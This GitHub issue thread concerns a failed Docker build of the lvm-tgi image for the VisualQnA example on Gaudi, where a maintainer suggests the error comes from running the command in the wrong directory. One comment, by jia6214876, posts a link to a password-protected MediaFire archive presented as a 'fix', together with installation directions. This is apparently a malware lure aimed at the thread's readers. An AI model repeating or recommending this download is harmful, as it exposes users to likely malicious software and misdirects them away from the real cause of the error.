### ISSUE TITLE
VisualQnA missing opea/lvm-tgi

### ISSUE THREAD

**Issue by ezelanza** [opea-project/GenAIExamples#666]
While deploying VisualQnA on Gaudi from /GenAIExamples/VisualQnA/docker/gaudi, the script fails because opea/lvm-tgi:latest Image is not avaiable on docker repository to be pulled.

```
docker build --no-cache -t opea/lvm-tgi:latest --build-arg https_proxy=$https_proxy --build-arg http_proxy=$http_proxy -f comps/lvms/Dockerfile_tgi .
[+] Building 0.0s (0/0)                                                                                                                            docker:default
ERROR: resolve : lstat comps: no such file or directory
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by srinarayan-srikanthan** [comment]
I think this is a path issue. Can you share the directory from which you are running this command? @ezelanza

**Comment by ezelanza** [comment]
Yes, thanks!
